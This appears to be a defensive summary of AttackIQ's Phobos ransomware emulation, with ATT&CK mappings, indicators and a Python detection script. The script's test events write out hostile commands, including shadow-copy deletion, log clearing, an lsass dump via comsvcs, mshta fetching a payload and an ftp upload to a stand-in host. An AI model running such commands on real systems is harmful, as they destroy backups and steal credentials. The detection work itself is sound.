Response to CISA Advisory (AA24-060A): #StopRansomware: Phobos Ransomware

AttackIQ published an assessment template that emulates the TTPs associated with Phobos ransomware to help organizations validate detection and prevention controls after CISA/FBI/MS-ISAC advisory AA24-060A. The template covers execution, persistence, defense evasion, credential harvesting, exfiltration, and impact techniques and includes detection and mitigation guidance. #Phobos #AttackIQ

Keypoints

  • AttackIQ released an assessment template that emulates Phobos ransomware behaviors mapped to ATT&CK techniques to validate security controls.
  • Phobos is a RaaS family related to Dharma/Crysis and commonly used with commodity tools such as SmokeLoader, Cobalt Strike, and BloodHound.
  • Emulated techniques include DLL side‑loading, mshta usage, registry Run keys and Startup LNK persistence, disabling firewall/UAC, clearing event logs, and deleting VSS snapshots.
  • Credential access and escalation are emulated using Mimikatz and access token manipulation, plus IFEO injection for privilege escalation.
  • Data collection, archiving (7zip), exfiltration via FTP, and file encryption routines (including in‑place encryption and shadow copy deletion) are included to emulate full attack impact.
  • AttackIQ provides detection cues (e.g., monitor DLL loads, rundll32.exe loading comsvcs.dll to dump lsass, vssadmin Delete Shadows command lines) and maps mitigations to MITRE ATT&CK recommendations.

MITRE Techniques

  • [T1574.002] DLL Side‑Loading – Bundles a DLL with a susceptible Windows executable to execute actor code (‘Bundles a DLL with a Windows executable that is susceptible to DLL Side‑Loading to execute actor code.’)
  • [T1218.010] Mshta (System Binary Proxy Execution) – Abuses mshta.exe to download and execute remote VBScript payloads (‘Mshta.exe is a native Windows utility that threat actors can abuse to download remote payloads that include VBScript code.’)
  • [T1547.001] Registry Run Keys / Startup Folder – Persists by setting HKLM Run keys and creating LNK files in the Startup folder to execute at logon (‘sets the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry keys’ / ‘creates a LNK file in this directory that would execute at the next Logon for all users.’)
  • [T1562.004] Disable or Modify System Firewall – Temporarily disables Windows Firewall via netsh advfirewall to allow network connections (‘temporarily disables the Windows Firewall using the netsh advfirewall utility.’)
  • [T1548.002] Bypass User Account Control – Attempts to disable UAC by modifying a registry key (‘The malware attempts to disable UAC by setting a registry key.’)
  • [T1070.001] Clear Windows Event Logs – Uses wevtutil.exe to clear event logs to remove indicators (‘will use the wevtutil.exe binary to clear event logs from the system.’)
  • [T1134] Access Token Manipulation – Enumerates and impersonates active access tokens to escalate privileges (‘lists active access tokens that could be impersonated by another process.’)
  • [T1546.012] Image File Execution Options Injection – Sets IFEO registry entries to achieve persistence or escalation (‘sets Image File Execution Options to the registry of a specific process.’)
  • [T1003 / T1003.001] OS Credential Dumping (LSASS memory) – Uses Mimikatz to dump passwords and hashes from LSASS memory (‘uses the Mimikatz credential access tool to dump passwords and hashes for Windows accounts.’)
  • [T1105] Ingress Tool Transfer – Downloads payloads to memory and disk to test delivery controls (‘downloads to memory and saves to disk in independent scenarios to test network and endpoint controls.’)
  • [T1082] System Information Discovery – Calls RtlGetVersion and NetWkstaGetInfo to enumerate system info (‘call RtlGetVersion(Ntdll), and NetWkstaGetInfo(Netapi32) Windows API calls to enumerate system information.’)
  • [T1057] Process Discovery – Uses CreateToolhelp32Snapshot and Process32* APIs to list running processes (‘receive a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.’)
  • [T1083] File and Directory Discovery – Uses dir command to find files of interest and output to a temp file (‘uses the native dir command to find files of interest and output to a temporary file.’)
  • [T1560.001] Archive via Utility – Compresses collected files into .7z archives with 7zip (‘compresses all the specified input files … to a .7z archive by executing the 7zip binary file.’)
  • [T1048] Exfiltration Over Alternative Protocols – Emulates exfiltration via FTP to an attacker server (‘start an FTP connection against an AttackIQ server to emulate the exfiltration of sensitive information’).
  • [T1490] Inhibit System Recovery – Runs vssadmin.exe to delete Volume Shadow Copies to prevent restoration (‘Runs vssadmin.exe to delete a recent Volume Shadow Copy created by the attack graph.’)
  • [T1486] Data Encrypted for Impact – Performs in‑place file encryption matching Phobos encryption routines (‘performs the file encryption routines used by common ransomware families … Files matching an extension list are identified and encrypted in place’).

Indicators of Compromise

  • [Process/Binary] Common Windows utilities abused – mshta.exe (downloads VBScript payloads), vssadmin.exe (deletes Volume Shadow Copies), wevtutil.exe (clears event logs), and comsvcs.dll loaded through rundll32.exe (dumps LSASS memory; comsvcs is a DLL, not a standalone executable)
  • [Tools/Frameworks] Post‑exploitation and loaders – Mimikatz (LSASS dumps), Cobalt Strike (beaconing/command and control), SmokeLoader (initial loader), BloodHound (AD enumeration)
  • [Files/Artifacts] Persistence and packaging artifacts – LNK file in the Startup folder (startup persistence), HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry values (autostart), .7z archives produced by 7zip for collected data
  • [Commands/Command‑line patterns] Detection strings to watch – ‘vssadmin’ with ‘Delete Shadows’ in cmd.exe/powershell.exe command lines; rundll32.exe (or cmd.exe/powershell.exe) with a command line containing ‘comsvcs’, ‘MiniDump’ and the lsass PID for credential dumping attempts (match on the command line rather than on a ‘comsvcs’ process name, since comsvcs.dll never runs as its own process)
  • [URLs/Domains] Reference/analysis sources in the article – https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a (CISA advisory), https://www.attackiq.com/2024/03/01/response-to-cisa-advisory-aa24-060a/ (AttackIQ assessment)

AttackIQ’s technical assessment template focuses on reproducing Phobos operational steps so teams can validate controls across the full attack lifecycle. The emulation chain begins with execution techniques such as DLL side‑loading and mshta‑based payload retrieval, then establishes persistence via Run registry keys and Startup LNK files. Defense‑evasion actions include disabling the Windows Firewall (netsh advfirewall), attempting to disable UAC via registry modifications, and clearing event logs with wevtutil to remove forensic traces.

Post‑compromise behaviors in the template mirror real Phobos activity: discovery using Windows APIs and dir commands, process enumeration via CreateToolhelp32Snapshot/Process32* APIs, credential access through LSASS memory dumps with Mimikatz and access token manipulation, and privilege escalation using IFEO injection. The assessment also covers ingress/tool transfer (downloading payloads to memory/disk), collection/archiving with 7zip, exfiltration over FTP, deletion of Volume Shadow Copies via vssadmin, and in‑place file encryption routines similar to Phobos.

Detection guidance emphasizes monitoring for anomalous use of common binaries and command lines (e.g., mshta.exe downloading scripts, rundll32.exe invoking comsvcs.dll MiniDump against lsass, cmd/powershell invoking vssadmin Delete Shadows), tracking DLL/PE creation and loading into processes to detect side‑loading, and alerting on clearing of event logs. Mitigations mapped to ATT&CK include keeping software updated (M1051), following application developer guidance on safe DLL loading (M1013), restricting access to LSASS and privileged processes, enabling backup and recovery protections (M1053), and following CISA's patching and detection recommendations to reduce risk exposure.
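The command-line cues above, turned into runnable detection logic, as an added example that is not AttackIQ's or CISA's code. Each rule pairs a process image name with a command-line pattern (the shape of the article's ‘Process Name == … AND Command Line CONTAINS …’ cues) and is run over constructed Sysmon-style process-creation events covering the emulated techniques from the MITRE list: shadow copy deletion, log clearing, firewall disablement, mshta retrieval, comsvcs LSASS dumping, Run-key and IFEO registry writes, UAC disablement, 7zip archiving and scripted FTP. The event field names, every sample command line, the wmic variant of shadow copy deletion, the IFEO ‘Debugger’ value and the UAC ‘EnableLUA’ value are assumptions; the page names none of them.

```python
"""Command-line detections for the Phobos emulation steps (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record; field shape is assumed, not Sysmon's exact schema."""
    image: str          # full path of the started process
    command_line: str   # full command line as logged


@dataclass(frozen=True)
class Rule:
    technique: str
    name: str
    image: re.Pattern    # applied to the file-name part of ProcEvent.image
    cmdline: re.Pattern  # applied to the whole command line


def _r(pattern: str) -> re.Pattern:
    return re.compile(pattern, re.IGNORECASE)


RULES = [
    # T1490: vssadmin form from the article, plus the wmic form (assumed extension).
    Rule("T1490", "shadow copy deletion", _r(r"^(cmd|powershell|vssadmin|wmic)\.exe$"),
         _r(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete")),
    Rule("T1070.001", "event log cleared", _r(r"^(cmd|powershell|wevtutil)\.exe$"),
         _r(r"wevtutil(\.exe)?\s+(cl|clear-log)\b")),
    Rule("T1562.004", "firewall profile disabled", _r(r"^(cmd|powershell|netsh)\.exe$"),
         _r(r"netsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off")),
    Rule("T1218.010", "mshta fetching remote content", _r(r"^mshta\.exe$"),
         _r(r"(https?|ftp)://|javascript:|vbscript:")),
    # comsvcs is a DLL invoked through rundll32.exe, so key on the command line.
    Rule("T1003.001", "comsvcs MiniDump of lsass", _r(r"^(cmd|powershell|rundll32)\.exe$"),
         _r(r"comsvcs(\.dll)?.*minidump")),
    Rule("T1547.001", "Run key written via reg.exe", _r(r"^(cmd|powershell|reg)\.exe$"),
         _r(r"reg(\.exe)?\s+add\s+.*\\CurrentVersion\\Run(Once)?\b")),
    # 'Debugger' (IFEO) and 'EnableLUA' (UAC) are the usual values; assumed here.
    Rule("T1546.012", "IFEO Debugger set", _r(r"^(cmd|powershell|reg)\.exe$"),
         _r(r"reg(\.exe)?\s+add\s+.*Image File Execution Options.*\s/v\s+Debugger\b")),
    Rule("T1548.002", "UAC disabled (EnableLUA=0)", _r(r"^(cmd|powershell|reg)\.exe$"),
         _r(r"reg(\.exe)?\s+add\s+.*\\Policies\\System\b.*EnableLUA.*\s/d\s+0\b")),
    Rule("T1560.001", "7zip archive created", _r(r"^(cmd|powershell|7z|7za)\.exe$"),
         _r(r"\b7za?(\.exe)?\s+a\b.*\.7z\b")),
    Rule("T1048", "scripted ftp session", _r(r"^(cmd|powershell|ftp)\.exe$"),
         _r(r"\bftp(\.exe)?\s+.*-s:")),
]


def match_rules(event: ProcEvent) -> list[str]:
    """Return the ATT&CK technique IDs whose image AND command-line patterns both hit."""
    name = event.image.rsplit("\\", 1)[-1]
    return [r.technique for r in RULES
            if r.image.search(name) and r.cmdline.search(event.command_line)]


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> technique IDs, omitting events that trigger nothing."""
    out: dict[int, list[str]] = {}
    for idx, ev in enumerate(events):
        hits = match_rules(ev)
        if hits:
            out[idx] = hits
    return out


# Constructed sample telemetry; the last two are benign admin commands that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"cmd.exe /c vssadmin delete shadows /all /quiet"),
    ProcEvent(r"C:\Windows\System32\wevtutil.exe", r"wevtutil.exe cl Security"),
    ProcEvent(r"C:\Windows\System32\netsh.exe", r"netsh advfirewall set allprofiles state off"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"mshta.exe http://198.51.100.10/payload.hta"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\l.dmp full"),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\svc.exe"),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r'reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d C:\Users\Public\svc.exe'),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"cmd.exe /c 7z.exe a -p C:\Users\Public\out.7z C:\Users\alice\Documents"),
    ProcEvent(r"C:\Windows\System32\ftp.exe", r"ftp -s:C:\Users\Public\up.txt 198.51.100.10"),
    ProcEvent(r"C:\Windows\System32\vssadmin.exe", r"vssadmin list shadows"),
    ProcEvent(r"C:\Windows\System32\wevtutil.exe", r"wevtutil epl System C:\Temp\sys.evtx"),
]


if __name__ == "__main__":
    for idx, techniques in scan(SAMPLE_EVENTS).items():
        print(f"event {idx:2d}: {', '.join(techniques)}  <- {SAMPLE_EVENTS[idx].command_line}")
```

The two benign records (a backup job listing shadows, a helpdesk export of an event log) are there to show the rules key on the destructive verb, not on the binary name alone. On real telemetry you would add the parent image and user context before alerting, and pair the comsvcs rule with LSASS process-access events for the cases where the dump is taken without a visible command line.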

Read more: https://www.attackiq.com/2024/03/01/response-to-cisa-advisory-aa24-060a/